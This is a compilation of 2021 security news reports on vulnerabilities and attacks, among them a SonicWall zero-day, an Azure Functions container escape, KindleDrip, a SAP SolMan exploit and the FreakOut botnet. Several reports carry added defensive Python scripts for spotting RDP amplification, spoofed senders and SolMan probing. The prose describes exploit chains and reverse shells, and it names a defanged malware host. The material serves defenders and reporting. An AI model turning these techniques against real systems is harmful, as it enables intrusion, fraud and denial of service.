The update is a priority level 2, which according to Adobe “resolves vulnerabilities in a product that has historically been at elevated risk.”

Magento would be categorized as an “elevated risk” because it is commonly targeted by attackers such as the Magecart threat group, which hits e-commerce stores with attacks like web skimming. However, there are currently no known exploits for these flaws, said Adobe.

Other Security Flaws in Adobe Products
Adobe on Tuesday also patched critical-severity flaws in Adobe Photoshop (CVE-2021-21049, CVE-2021-21050, CVE-2021-21048, CVE-2021-21051 and CVE-2021-21047), Adobe Animate (CVE-2021-21052) and Adobe Illustrator (CVE-2021-21053, CVE-2021-21054).

However, these patches came with a priority level 3 ranking, which means that they resolve vulnerabilities in a product that “has historically not been a target for attackers.”

For these flaws, “Adobe recommends administrators install the update at their discretion,” according to the security update.

Adobe’s February fixes come on the heels of a busy January security update, when the company patched seven critical vulnerabilities. The impact of the most serious of these flaws ranged from arbitrary code execution to sensitive information disclosure.


Experts warn of active exploitation of SonicWall zero-day in the wild
2.2.2021 
Exploit  Securityaffairs

Researchers from the security firm NCC Group warn of the exploitation in the wild of a SonicWall zero-day vulnerability.
Security experts from the firm NCC Group have detected “indiscriminate” exploitation of a SonicWall zero-day in attacks in the wild, ZDNet reported.

NCC Group first disclosed the attacks on SonicWall devices on Sunday but did not provide details about the flaw exploited by the threat actors.

The experts reported the vulnerability to the security provider; they also claim to have identified the same zero-day vulnerability exploited by the SolarWinds hackers to breach SonicWall’s internal network.

However, SonicWall did not confirm that the vulnerability under active exploitation is the same one involved in the attacks against its infrastructure.

On January 29, SonicWall announced it was still investigating the presence of a zero-day vulnerability in its Secure Mobile Access (SMA) gateways.

SMA gateways are used by enterprise organizations to provide remote employees with access to resources on intranets.

“As we head into the weekend, we continue to investigate the SMA 100 Series, however the presence of a potential zero-day vulnerability remains unconfirmed.” reads SonicWall’s update.

“We have also analyzed several reports from our customers of potentially compromised SMA 100 series devices. In these cases, we have so far only observed the use of previously stolen credentials to log into the SMA devices. The SMA appliance, due to its nature and due to prevalence of remote work during the pandemic, effectively acts as a “canary” to raising an alert about inappropriate access.”

The NCC team confirmed it had demonstrated how to exploit a possible candidate for the vulnerability.

SonicWall experts pointed out that proof of concept (PoC) exploit code utilizing the Shellshock exploit shared on social media is not effective against its devices.

“We’re also aware of social media posts that shared either supposed proof of concept (PoC) exploit code utilizing the Shellshock exploit, or screenshots of allegedly compromised devices. We have confirmed that the Shellshock attack has been mitigated by patches that we released in 2015. We have also tested the shared PoC code and have so far concluded that it is not effective against firmware released after the 2015 patch.” continues the update. “However, we’ll continue to closely monitor any new posts and investigate new information. This should also serve as a reminder to our customer base to always patch and keep current on internet facing devices.”

The company has released an updated security best practices guide for the SMA 100 series devices.


Hackers Exploiting Critical Zero-Day Bug in SonicWall SMA 100 Devices

2.2.2021  Exploit  Thehackernews

SonicWall on Monday warned of active exploitation attempts against a zero-day vulnerability in its Secure Mobile Access (SMA) 100 series devices.

The flaw, which affects both physical and virtual SMA 100 10.x devices (SMA 200, SMA 210, SMA 400, SMA 410, SMA 500v), came to light after the NCC Group on Sunday alerted it had detected "indiscriminate use of an exploit in the wild."

Details of the exploit have not been disclosed to prevent the zero-day from being exploited further, but a patch is expected to be available by the end of day on February 2, 2021.

"A few thousand devices are impacted," SonicWall said in a statement, adding, "SMA 100 firmware prior to 10.x is unaffected by this zero-day vulnerability."

On January 22, The Hacker News exclusively revealed that SonicWall had been breached as a consequence of a coordinated attack on its internal systems by exploiting "probable zero-day vulnerabilities" in its SMA 100 series remote access devices.

Then last week, on January 29, it issued an update stating it had so far only observed the use of previously stolen credentials to log into the SMA 100 series appliances.

While SonicWall has not shared many details about the intrusion citing the ongoing investigation, the latest development points to evidence that a critical zero-day in the SMA 100 series 10.x code may have been exploited to carry out the attack.

SonicWall is internally tracking the vulnerability as SNWLID-2021-0001.

The company said SonicWall firewalls and SMA 1000 series appliances, as well as all respective VPN clients, are unaffected and that they remain safe to use.

In the interim, the company recommends customers enable multi-factor authentication (MFA) and reset user passwords for accounts that utilize the SMA 100 series with 10.x firmware.

"If the SMA 100 series (10.x) is behind a firewall, block all access to the SMA 100 on the firewall," the company said. Users also have the option of shutting down the vulnerable SMA 100 series devices until a patch is available, or of loading firmware version 9.x after a factory default settings reboot.


Exploiting a bug in Azure Functions to escape Docker
1.2.2021 
Exploit  Securityaffairs

Expert disclosed an unpatched vulnerability in Microsoft Azure Functions that could be exploited to escape the Docker container hosting them.
Cybersecurity researcher Paul Litvak from Intezer Lab disclosed an unpatched vulnerability in Microsoft Azure Functions that could be exploited by an attacker to escalate privileges and escape the Docker container that hosts them.

The expert and his colleagues were investigating the Azure compute infrastructure.

“We found a new vulnerability in Azure Functions, which would allow an attacker to escalate privileges and escape the Azure Functions Docker container to the Docker host.” reads the post published by Intezer Lab.

“After an internal assessment Microsoft has determined that the vulnerability has no security impact on Function users as the Docker host itself is protected by a Hyper-V boundary.”

Azure Functions is an event-driven, compute-on-demand experience that extends the existing Azure application platform with capabilities to implement code triggered by events occurring in Azure, in third-party services, or on-premises systems.

Azure Functions can be triggered by HTTP requests and run for only a few minutes, just long enough to handle the event. The user’s code runs in an Azure-managed container and is served without requiring the user to manage their own infrastructure. The experts discovered that the code is not segmented securely and could be abused to escape the container and access the underlying environment.

The experts created an HTTP trigger to gain a foothold on the Function container, then wrote a reverse shell that connected to their server once the Function was executed, giving them an interactive shell.

The researchers noticed that they were running as an unprivileged ‘app’ user on an endpoint with a ‘SandboxHost’ hostname, so they used the container to find sockets belonging to processes with “root” privileges.

“We created a demonstration of the vulnerability—mimicking an attacker having execution on Azure Functions and escalating privileges to achieve a full escape to the Docker host.” continues the post.

The researchers found three privileged processes with an open port: an NGINX process with no known vulnerabilities, and the MSI and Mesh processes.

Intezer found a flaw in the “Mesh” process that could be exploited to escalate to root within the container.

In the last phase of the attack, the experts extended privileges assigned to the container to escape the Docker container and run an arbitrary command on the host.

The experts published a PoC exploit code to set up a reverse shell with the squashfs to escalate privileges in Azure Function, and escape the Docker environment.


Experts Detail A Recent Remotely Exploitable Windows Vulnerability
24.1.2021 
Exploit  Thehackernews

More details have emerged about a security feature bypass vulnerability in Windows NT LAN Manager (NTLM) that was addressed by Microsoft as part of its monthly Patch Tuesday updates earlier this month.

The flaw, tracked as CVE-2021-1678 (CVSS score 4.3), was described as a "remotely exploitable" flaw found in a vulnerable component bound to the network stack, although exact details of the flaw remained unknown.

Now, according to researchers from CrowdStrike, the security bug, if left unpatched, could allow a bad actor to achieve remote code execution via an NTLM relay.

"This vulnerability allows an attacker to relay NTLM authentication sessions to an attacked machine, and use a printer spooler MSRPC interface to remotely execute code on the attacked machine," the researchers said in a Friday advisory.

NTLM relay attacks are a kind of man-in-the-middle (MitM) attack that typically permits attackers with access to a network to intercept legitimate authentication traffic between a client and a server and relay these validated authentication requests in order to access network services.

Successful exploits could also allow an adversary to remotely run code on a Windows machine or move laterally on the network to critical systems such as servers hosting domain controllers by reusing the NTLM credentials directed at the compromised server.

While such attacks can be thwarted by SMB and LDAP signing and turning on Enhanced Protection for Authentication (EPA), CVE-2021-1678 exploits a weakness in MSRPC (Microsoft Remote Procedure Call) that makes it vulnerable to a relay attack.

Specifically, the researchers found that IRemoteWinspool — an RPC interface for remote printer spooler management — could be leveraged to execute a series of RPC operations and write arbitrary files on a target machine using an intercepted NTLM session.

Microsoft, in a support document, said it addressed the vulnerability by "increasing the RPC authentication level and introducing a new policy and registry key to allow customers to disable or enable Enforcement mode on the server-side to increase the authentication level."

In addition to installing the January 12 Windows update, the company has urged organizations to turn on Enforcement mode on the print server, a setting which it says will be enabled on all Windows devices by default starting June 8, 2021.


Threat Actors Can Exploit Windows RDP Servers to Amplify DDoS Attacks
23.1.2021  Exploit  Threatpost

Netscout researchers identify more than 14,000 existing servers that can be abused by ‘the general attack population’ to flood organizations’ networks with traffic.

Cybercriminals can exploit Microsoft Remote Desktop Protocol (RDP) as a powerful tool to amplify distributed denial-of-service (DDoS) attacks, new research has found.

Attackers can abuse RDP to launch UDP reflection/amplification attacks with an amplification ratio of 85.9:1, principal engineer Roland Dobbins and senior network security analyst Steinthor Bjarnason from Netscout said in a report published online this week.

However, not all RDP servers can be used in this way. It’s possible only when the service is enabled on UDP port 3389 in addition to the standard TCP port 3389, researchers said.

Netscout so far has identified more than 14,000 “abusable” Windows RDP servers that can be misused by attackers in DDoS attacks—troubling news at a time when this type of attack is on the rise due to the increased volume of people online during the ongoing coronavirus pandemic.

This risk was highlighted earlier this week when researchers identified a new malware variant dubbed Freakout adding endpoints to a botnet to target Linux devices with DDoS attacks.

What’s more, while initially only advanced attackers with access to “bespoke DDoS attack infrastructure” used this method of amplification, researchers also observed RDP servers being abused in DDoS-for-hire services by so-called “booters,” they said. This means “the general attacker population” can also use this mode of amplification to add heft to their DDoS attacks.

RDP is a part of the Microsoft Windows OS that provides authenticated remote virtual desktop infrastructure (VDI) access to Windows-based workstations and servers. System administrators can configure RDP to run on TCP port 3389 and/or UDP port 3389.

Attackers can send the amplified attack traffic, which is comprised of non-fragmented UDP packets that originate at UDP port 3389, to target a particular IP address and UDP port of choice, researchers said.

“In contrast to legitimate RDP session traffic, the amplified attack packets are consistently 1,260 bytes in length, and are padded with long strings of zeroes,” Dobbins and Bjarnason explained.
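The four traits above (source UDP/3389, not fragmented, a constant 1,260 bytes, long runs of zero bytes) are enough to triage sampled traffic. The following Python is an added example written for this page, not Netscout's code; the datagram records are constructed, the `MIN_ZERO_RUN` threshold is an assumption, and in practice the records would come from a flow or packet capture:

```python
"""Classify sampled UDP datagrams against the RDP reflection signature that
Netscout described: sourced from UDP/3389, not fragmented, a constant
1,260 bytes on the wire and padded with long runs of zero bytes.
Added example, not Netscout code.  MIN_ZERO_RUN and the sample datagrams
are assumptions (constructed); feed it records from your own capture."""
from collections import defaultdict
from dataclasses import dataclass

RDP_UDP_PORT = 3389
AMPLIFIED_LEN = 1260     # bytes on the wire, as reported by Netscout
MIN_ZERO_RUN = 256       # assumption: what counts as a "long string of zeroes"


@dataclass
class Datagram:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    length: int          # total length on the wire, in bytes
    fragmented: bool
    payload: bytes


def longest_zero_run(payload: bytes) -> int:
    """Length of the longest run of 0x00 bytes in the payload."""
    best = run = 0
    for b in payload:
        run = run + 1 if b == 0 else 0
        best = max(best, run)
    return best


def is_rdp_amplification(d: Datagram) -> bool:
    """Legitimate RDP-UDP replies vary in size and carry real session data;
    the reflected attack packets match all four traits at once."""
    return (d.src_port == RDP_UDP_PORT
            and not d.fragmented
            and d.length == AMPLIFIED_LEN
            and longest_zero_run(d.payload) >= MIN_ZERO_RUN)


def summarize(datagrams):
    """Per victim (destination IP): which reflectors hit it and how hard."""
    report = defaultdict(lambda: {"reflectors": set(), "packets": 0, "bytes": 0})
    for d in datagrams:
        if is_rdp_amplification(d):
            entry = report[d.dst_ip]
            entry["reflectors"].add(d.src_ip)
            entry["packets"] += 1
            entry["bytes"] += d.length
    return dict(report)


def amplification_ratio(request_bytes: int, response_bytes: int) -> float:
    """Bytes returned per byte sent; 85.9 is the figure Netscout reported."""
    return response_bytes / request_bytes


# Constructed sample: one legitimate reply, two reflected packets, two decoys.
_PADDED = bytes([0x24, 0x01]) + b"\x00" * (AMPLIFIED_LEN - 28 - 2)  # 28 = IPv4 + UDP headers
SAMPLE = [
    Datagram("198.51.100.5", 3389, "192.0.2.10", 53444, 540, False, bytes(range(256)) * 2),
    Datagram("198.51.100.5", 3389, "203.0.113.10", 80, 1260, False, _PADDED),
    Datagram("198.51.100.6", 3389, "203.0.113.10", 80, 1260, False, _PADDED),
    Datagram("198.51.100.7", 3389, "203.0.113.10", 80, 1260, True, _PADDED),   # fragment: not counted
    Datagram("198.51.100.8", 123, "203.0.113.10", 80, 1260, False, _PADDED),   # not from RDP
]

if __name__ == "__main__":
    for victim, s in summarize(SAMPLE).items():
        print(victim, len(s["reflectors"]), "reflectors,",
              s["packets"], "packets,", s["bytes"], "bytes")
```

A legitimate RDP-UDP reply fails the test because its size varies and its payload carries real session data, which is why the check requires all four traits rather than the source port alone (the researchers note that filtering on UDP/3389 by itself overblocks legitimate replies). On the server side, the interim measure they recommend, turning off the UDP transport, corresponds on current Windows builds to the Group Policy setting "Select RDP transport protocols" set to "Use only TCP" under Remote Desktop Session Host > Connections.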

Leveraging Windows RDP servers in this way has significant impact on victim organizations, including “partial or full interruption of mission-critical remote-access services,” as well as other service disruptions due to transit capacity consumption and associated effects on network infrastructure, researchers said.

“Wholesale filtering of all UDP/3389-sourced traffic by network operators may potentially overblock legitimate internet traffic, including legitimate RDP remote-session replies,” researchers noted.

To mitigate the use of RDP to amplify DDoS attacks and their related impact, researchers made a number of suggestions to Windows systems administrators. First and foremost they should deploy Windows RDP servers behind VPN concentrators to prevent them from being abused to amplify DDoS attacks, they said.

“Network operators should perform reconnaissance to identify abusable Windows RDP servers on their networks and/or the networks of their downstream customers,” Dobbins and Bjarnason advised. “It is strongly recommended that RDP servers should be accessible only via VPN services in order to shield them from abuse.”

If this mitigation is not possible, however, they “strongly recommended” that at the very least, system administrators disable RDP via UDP port 3389 “as an interim measure,” they said.

Internet access network traffic from internal organizational personnel should be deconflated from internet traffic to/from public-facing internet properties and served via separate upstream internet transit links.

At the same time, network operators should implement Best Current Practices (BCPs) for all relevant network infrastructure, architecture and operations, including “situationally specific network-access policies that only permit internet traffic via required IP protocols and ports,” researchers said.


KindleDrip exploit – Hacking a Kindle device with a simple email

23.1.2021  Exploit  Securityaffairs

KindleDrip: Amazon addressed a number of flaws affecting the Kindle e-reader that could have allowed an attacker to take control of victims’ devices.
Security experts at Realmode Labs discovered multiple vulnerabilities in the Kindle e-reader that could have allowed an attacker to take over victims’ devices.
The researchers noticed that the “Send to Kindle” feature delivers e-books to a user's device as email attachments, and that this behavior could be abused to deliver a malicious e-book to a potential victim.
Amazon has addressed the flaws, which could have allowed an attacker to take control of victims’ devices simply by sending them a malicious e-book.

The experts discovered three vulnerabilities that could be chained (KindleDrip exploit) by a remote attacker to execute code as root on the target’s Kindle. The attacker only needs to know the email address associated with the device of the victim.

“The first vulnerability allowed an attacker to send an e-book to the victim’s Kindle device. Then, the second vulnerability was used to run arbitrary code while the e-book is parsed, under the context of a weak user. The third vulnerability allows the attacker to escalate privileges and run code as root.” reads the post published by the experts.

By chaining the issues, an attacker can obtain the device credentials, make purchases on the Kindle store using the victim’s credit card, or sell an e-book on the store and transfer money to their own account.

Realmode Labs reported the flaws to Amazon on October 17 and the company released security updates to address them on December 10, 2020.

The Send to Kindle feature lets a Kindle user send MOBI e-books to their device. Amazon generates a special @kindle.com email address for each user; an e-book sent as an attachment to that address from one of a predefined list of approved email addresses is delivered to the device.

The experts discovered that Amazon did not verify the authenticity of the email sender, which means that an attacker could spoof an address present in the list of approved addresses.
“Since many email servers still don’t support authentication, it is not unreasonable to assume that Amazon will not verify the authenticity of the sender.” continues the post.

“To test this, I used an email spoofing service to spoof an email message and send an e-book to my device. To my pleasant surprise, the e-book appeared on the device! To make matters worse, there is no indication that the e-book was received from an email message. It also appeared on the home page of the Kindle with a cover image of our choice, which makes phishing attacks much easier.”

Once the e-book is sent to a target device, the attacker could have exploited a buffer overflow flaw in the JPEG XR image format library as well as a privilege escalation issue in the “stackdumpd” root process to inject arbitrary commands and run the code as root.

Upon opening the e-book and tapping on one of the links in the table of contents, the device will open an HTML page in the browser that contained a specially-crafted JPEG XR image. Once the image is parsed, the malicious code is executed allowing the attacker to carry out multiple malicious activities.

Experts also published a video PoC of the KindleDrip exploit chain on a new Kindle 10 running firmware version 5.13.2.

 


Experts warn of scanning activity for critical SAP SolMan flaw after the release of exploit
22.1.2021 
Exploit  Securityaffairs

Experts warn of automated scanning activity for servers affected by a critical SAP SolMan flaw after the release of an exploit code.
Experts warn of automated scanning for servers affected by a critical vulnerability in SAP Solution Manager (SolMan) 7.2, tracked as CVE-2020-6207; attackers started probing systems after exploit code for the flaw was released.

“SAP Solution Manager (User Experience Monitoring), version- 7.2, due to Missing Authentication Check does not perform any authentication for a service resulting in complete compromise of all SMDAgents connected to the Solution Manager.” reads the advisory.

SAP Solution Manager is a product developed by SAP SE that offers end-to-end application lifecycle management for SAP customers: it streamlines business processes, surfaces improvement options and manages the application lifecycle, with the aim of increasing efficiency and decreasing risk within customers' existing maintenance agreements.

The vulnerability resides in the EEM Manager component and is caused by a missing authentication check, it has been rated as critical and received the CVSS base score of 10.0.

A successful attack exploiting this vulnerability would put an organization’s mission-critical SAP applications, business process and data at risk—impacting cybersecurity and regulatory compliance.

“While exploits are released regularly online, this hasn’t been the case for SAP vulnerabilities, for which publicly available exploits have been limited.” reads a post published by Onapsis. “The release of a public exploit significantly increases the chance of an attack attempt since it also expands potential attackers not only to SAP-experts or professionals, but also to script-kiddies or less-experienced attackers that can now leverage public tools instead of creating their own.”

SolMan centralizes the management of all SAP and non-SAP systems within an SAP landscape. It handles implementation, support, monitoring and maintenance of mission-critical SAP applications, including ERP, CRM, HCM, SCM, BI, financials and others. An attacker able to gain access to SolMan could compromise any system connected to it.

In early 2020, researchers from Onapsis Research Labs reported that, in default configurations, unauthenticated remote attackers could execute operating system commands on the satellite systems and obtain full privileges on the associated SAP systems. SAP addressed the flaw in March 2020 (SAP Security Note #2890213), so SAP customers with proper patching in place should not be affected by this exploit.

A remote unauthenticated attacker could exploit this flaw to execute highly privileged administrative tasks in the connected SAP SMD Agents. Every system connected to the SolMan can be potentially affected.

Below some of the possible exploitation scenarios:

Shutting down any SAP system in the landscape (not only SAP SolMan)
Causing IT control deficiencies impacting financial integrity and privacy leading to regulatory compliance violations such as Sarbanes-Oxley (SOX), GDPR and others
Deleting any data in the SAP systems, including key data that can cause business disruption
Assigning superuser (e.g. SAP_ALL) privileges to any existing or new user, enabling those users to run business operations that would normally require specific privileges to bypass other Segregation of Duties (SoD) controls
Reading sensitive data from the database, including employee and customer personal information

Last week, Dmitry Chastuhin released PoC exploit code for CVE-2020-6207, described as being for educational purposes.

“This script allows to check and exploit missing authentication checks in SAP EEM servlet (tc~smd~agent~application~eem) that lead to RCE on SAP SMDAgents connected to SAP Solution Manager” read the description published on GitHub.

After the release of the exploit code, security researchers at Onapsis have observed a scanning activity in the wild for vulnerable systems.


Amazon Awards $18,000 for Exploit Allowing Kindle E-Reader Takeover
22.1.2021 
Exploit  Securityweek

Amazon has awarded an $18,000 bug bounty for an exploit chain that could have allowed an attacker to take complete control of a Kindle e-reader simply by knowing the targeted user’s email address.

The attack, dubbed KindleDrip, was discovered in October 2020 by Yogev Bar-On, a researcher at Israel-based cybersecurity consulting firm Realmode Labs. KindleDrip involved the exploitation of three different security holes, all of which were addressed by Amazon.

The first vulnerability in the exploit chain was related to the “Send to Kindle” feature, which allows users to send an e-book in MOBI format to their Kindle device via email as an attachment. Amazon generates an @kindle.com email address where a user can send e-books as an attachment from a list of email addresses approved by the user.

Bar-On discovered that he could abuse this feature to send a specially crafted e-book that would allow him to execute arbitrary code on the targeted device. The malicious e-book achieved code execution by leveraging a vulnerability related to a library used by the Kindle to parse JPEG XR images. Exploitation required the user to click on a link inside an e-book that contained a malicious JPEG XR image, which would result in a web browser opening and the attacker’s code getting executed with limited privileges.

The researcher also discovered a vulnerability that allowed him to escalate privileges and execute the code as root, which gave him complete access to the device.


“The attacker could access device credentials and make purchases on the Kindle store using the victim’s credit card. Attackers could sell an e-book on the store and transfer money to their account,” Bar-On explained in a blog post. “At least the confirmation email would make the victim aware of the purchase.”

It's worth noting that an attacker could not gain access to actual credit card numbers or passwords through such an attack because this type of data is not stored on the device. Instead, they could obtain special tokens that can be used to access the victim's account.

An attacker would have only needed the targeted user’s email address and to convince the victim to click on a link inside the malicious e-book. While the Send to Kindle feature only allows users to send e-books from pre-approved email addresses, the researcher pointed out that an attacker could have simply used an email spoofing service. The prefix of the @kindle.com email address of the targeted user is in many cases the same as their regular email.

The security holes that required changes to the Kindle firmware — the code execution and privilege escalation issues — were patched in December with the release of version 5.13.4. Amazon now also sends a verification link to email addresses that cannot be authenticated, it adds a few characters to some email aliases to make them more difficult to guess, and systems are in place to prevent brute-forcing of the email address. Kindle users do not need to take any action.
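Both the Realmode Labs write-up above and this one describe the same gap: an address on the user's approved list was trusted without the message's SPF, DKIM or DMARC verdicts being checked, and the fix was to send a verification link when the sender could not be authenticated. The following Python is an added example of such a gate, not Amazon's code; the authserv-id, the approved-sender list and the sample messages are assumptions constructed for the example:

```python
"""Sender-authentication gate for an e-mail driven 'send to device' feature.
Added example, not Amazon's code.  Assumes our inbound MX stamps an
Authentication-Results header (RFC 8601) under OUR_AUTHSERV_ID; headers
carrying any other authserv-id are ignored, since the sender could have
added them.  Sample messages are constructed."""
import re
from email import policy
from email.parser import BytesParser
from email.utils import parseaddr

OUR_AUTHSERV_ID = "mx.example.net"          # assumption: identifier of our own MX
VERDICT_RE = re.compile(r"\b(spf|dkim|dmarc)=([a-z]+)", re.I)


def authentication_results(msg, authserv_id=OUR_AUTHSERV_ID):
    """Collect spf/dkim/dmarc verdicts from headers stamped by our own MX only."""
    verdicts = {}
    for hdr in msg.get_all("Authentication-Results", []):
        ident, _, rest = str(hdr).partition(";")
        parts = ident.split()
        if not parts or parts[0].lower() != authserv_id.lower():
            continue                          # not ours: possibly forged by the sender
        for method, result in VERDICT_RE.findall(rest):
            verdicts[method.lower()] = result.lower()
    return verdicts


def sender_authenticated(verdicts):
    """A DMARC pass already implies an aligned SPF or DKIM pass; without a
    DMARC evaluation require both SPF and DKIM to pass."""
    if verdicts.get("dmarc") == "pass":
        return True
    return verdicts.get("spf") == "pass" and verdicts.get("dkim") == "pass"


def decide(raw, approved_senders, authserv_id=OUR_AUTHSERV_ID):
    """'accept': deliver the attachment to the device.
    'verify': approved address but unauthenticated; mail a confirmation link
              to that address instead of delivering.
    'reject': sender not on the user's approved list."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    sender = parseaddr(msg.get("From", ""))[1].lower()
    if sender not in {s.lower() for s in approved_senders}:
        return "reject"
    if sender_authenticated(authentication_results(msg, authserv_id)):
        return "accept"
    return "verify"


def _message(from_addr, auth_headers):
    """Build a minimal raw message (constructed test data)."""
    lines = [f"From: {from_addr}", "To: user_1a2b@kindle.com", "Subject: book"]
    lines += [f"Authentication-Results: {h}" for h in auth_headers]
    return ("\r\n".join(lines) + "\r\n\r\n(attachment omitted)\r\n").encode()


LEGIT = _message("owner@example.com", [
    "mx.example.net; spf=pass smtp.mailfrom=owner@example.com; "
    "dkim=pass header.d=example.com; dmarc=pass header.from=example.com"])
SPOOFED = _message("owner@example.com", [
    "mx.example.net; spf=fail smtp.mailfrom=owner@example.com; "
    "dkim=none; dmarc=fail header.from=example.com"])
FORGED_HEADER = _message("owner@example.com", [
    "attacker.invalid; dmarc=pass header.from=example.com",      # added by the sender
    "mx.example.net; spf=fail smtp.mailfrom=owner@example.com; "
    "dkim=none; dmarc=fail header.from=example.com"])

if __name__ == "__main__":
    for name, raw in (("legit", LEGIT), ("spoofed", SPOOFED), ("forged", FORGED_HEADER)):
        print(name, decide(raw, ["owner@example.com"]))
```

The check that the Authentication-Results header was stamped by our own MX matters: a sender can add such a header themselves, so any verdict not carrying our authserv-id is discarded (the `FORGED_HEADER` sample). Parsing the MOBI attachment is a separate concern; this gate only decides whether the message may reach the parser at all.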

A video showing how a KindleDrip attack worked has been published.

“The security of our devices and services is a top priority. We have already released an automatic software update over the Internet fixing this issue for all Amazon Kindle models released after 2014,” an Amazon spokesperson told SecurityWeek. “Other impacted Kindle models will also receive this fix. We also have measures in place to help prevent customers from receiving content they haven’t requested. We appreciate the work of independent researchers who help bring potential issues to our attention.”


Scanning Activity Detected After Release of Exploit for Critical SAP SolMan Flaw
21.1.2021 
Exploit  Securityweek

A Russian researcher has made public on GitHub a functional exploit targeting a critical vulnerability that SAP patched in its Solution Manager product in March 2020.

Solution Manager (SolMan) was designed to provide central management for SAP and non-SAP systems and requires the Solution Manager Diagnostic Agent (SMDAgent) to be installed on each host to handle communications, monitoring, and diagnostics.

Tracked as CVE-2020-6207 and featuring a CVSS score of 10, the security flaw is a missing authorization check in the EEM Manager component of SolMan, which could allow an unauthenticated, remote attacker to execute operating system commands on hosts, as the SMDAgent.

The researcher who published the fully-functional exploit for the bug on GitHub claims the project is for educational purposes only, and that it “cannot be used for law violation or personal gain.”

Following the publication of the exploit, however, security researchers at Onapsis, a firm that specializes in securing SAP applications, have observed scanning in the wild for vulnerable systems.

It’s not common for proof-of-concept (PoC) exploits targeting SAP vulnerabilities to be made public, Onapsis says, adding that the availability of the code will likely result in an increase in exploitation attempts from both SAP-expert adversaries, and script kiddies.

“A successful attack exploiting this vulnerability would put an organization’s mission-critical SAP applications, business process and data at risk—impacting cybersecurity and regulatory compliance,” Onapsis notes.

Being an administrative system, SolMan “has connections and trust relationships with every SAP system throughout the landscape,” and an attacker able to compromise it would essentially gain access to any business system connected to it, the security firm warns.

Attackers looking to exploit the vulnerability need access to the SolMan HTTP(s) port. The remote attacker would gain control of the affected system with admin privileges, enabling them to conduct a wide range of activities.

“An attacker will need network visibility to SolMan as this system is not frequently exposed to the Internet. So for most companies, risk of this exploit should be mostly limited to internal attacks (unless external attackers have already compromised another system and are inside the network),” Onapsis explains.

Organizations that have already applied the available patches are not exposed to attacks leveraging this or other similar exploits. According to Onapsis, however, SolMan is often overlooked when it comes to patching, mainly because it does not hold any business information.
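Since the EEM servlet performs no authentication check, the only record of an exploitation attempt against an unpatched SolMan is the HTTP request itself. The following Python triages a SolMan access log for such requests and separates internal from external sources, in line with the Onapsis point above (and the Securityaffairs write-up further up) that the risk is mostly internal unless the port is reachable from outside. It is an added example, neither Onapsis' nor SAP's code: the log format, the `EEM_PATH` prefix and the allowlisted admin host are assumptions, and the log lines are constructed.

```python
"""Find requests to the SolMan EEM admin servlet from hosts that should not
be talking to it.  Added example (not Onapsis' or SAP's code).  Assumptions:
the access log uses the common format constructed below, the servlet is
reached under EEM_PATH, and ALLOWED_CLIENTS are the hosts permitted to
call it; adjust all three to your landscape."""
import ipaddress
import re
from collections import Counter

EEM_PATH = "/EemAdminService/"      # assumption: path prefix of the EEM servlet
ALLOWED_CLIENTS = {"10.1.1.5"}      # assumption: e.g. the admin jump host
PRIVATE_NETS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)')


def parse(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def source_scope(ip):
    addr = ipaddress.ip_address(ip)
    return "internal" if any(addr in n for n in PRIVATE_NETS) else "external"


def eem_findings(lines, allowed=ALLOWED_CLIENTS):
    """One finding per EEM request from a non-allowlisted client.  Because
    the servlet does not authenticate, an HTTP 200 on a POST means the
    request was processed, not refused."""
    findings = []
    for line in lines:
        rec = parse(line)
        if not rec or not rec["path"].startswith(EEM_PATH):
            continue
        if rec["ip"] in allowed:
            continue
        findings.append({
            "ip": rec["ip"],
            "scope": source_scope(rec["ip"]),
            "method": rec["method"],
            "path": rec["path"],
            "status": int(rec["status"]),
            "processed": rec["method"] == "POST" and rec["status"] == "200",
        })
    return findings


def per_source(findings):
    """Hit count per client IP."""
    return Counter(f["ip"] for f in findings)


SAMPLE_LOG = [  # constructed lines
    '203.0.113.7 - - [18/Jan/2021:10:01:02 +0000] "POST /EemAdminService/EemAdmin HTTP/1.1" 200 512',
    '10.1.1.5 - - [18/Jan/2021:10:01:05 +0000] "POST /EemAdminService/EemAdmin HTTP/1.1" 200 512',
    '10.9.9.9 - - [18/Jan/2021:10:02:00 +0000] "GET /EemAdminService/EemAdmin?wsdl HTTP/1.1" 200 2048',
    '203.0.113.7 - - [18/Jan/2021:10:02:30 +0000] "POST /EemAdminService/EemAdmin HTTP/1.1" 200 640',
    '10.1.1.5 - - [18/Jan/2021:10:03:00 +0000] "GET /irj/portal HTTP/1.1" 302 -',
]

if __name__ == "__main__":
    for f in eem_findings(SAMPLE_LOG):
        print(f)
    print(per_source(eem_findings(SAMPLE_LOG)))
```

Any hit from outside the allowlist on an unpatched system deserves investigation, and a 200 on a POST means the request went through. Internal hits are not automatically benign: a compromised internal host is exactly the pivot Onapsis describes.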


FreakOut! Ongoing Botnet Attack Exploiting Recent Linux Vulnerabilities

20.1.2021  BotNet  Exploit  Thehackernews
An ongoing malware campaign has been found exploiting recently disclosed vulnerabilities in network-attached storage (NAS) devices running on Linux systems to co-opt the machines into an IRC botnet for launching distributed denial-of-service (DDoS) attacks and mining Monero cryptocurrency.

The attacks deploy a new malware variant called "FreakOut" by leveraging critical flaws fixed in Laminas Project (formerly Zend Framework) and Liferay Portal as well as an unpatched security weakness in TerraMaster, according to Check Point Research's new analysis published today and shared with The Hacker News.

Attributing the malware to a long-time cybercriminal who has gone by the aliases Fl0urite and Freak on HackForums and Pastebin since at least 2015, the researchers said the flaws (CVE-2020-28188, CVE-2021-3007, and CVE-2020-7961) were weaponized to inject and execute malicious commands on the server.

Regardless of the vulnerability exploited, the attacker's end goal appears to be to download and execute a Python script named "out.py" using Python 2, which reached end-of-life last year, implying that the threat actor is banking on victim devices still having the deprecated interpreter installed.

"The malware, downloaded from the site hxxp://gxbrowser[.]net, is an obfuscated Python script which contains polymorphic code, with the obfuscation changing each time the script is downloaded," the researchers said, adding the first attack attempting to download the file was observed on January 8.

And indeed, three days later, cybersecurity firm F5 Labs warned of a series of attacks targeting NAS devices from TerraMaster (CVE-2020-28188) and Liferay CMS (CVE-2020-7961) in an attempt to spread N3Cr0m0rPh IRC bot and Monero cryptocurrency miner.

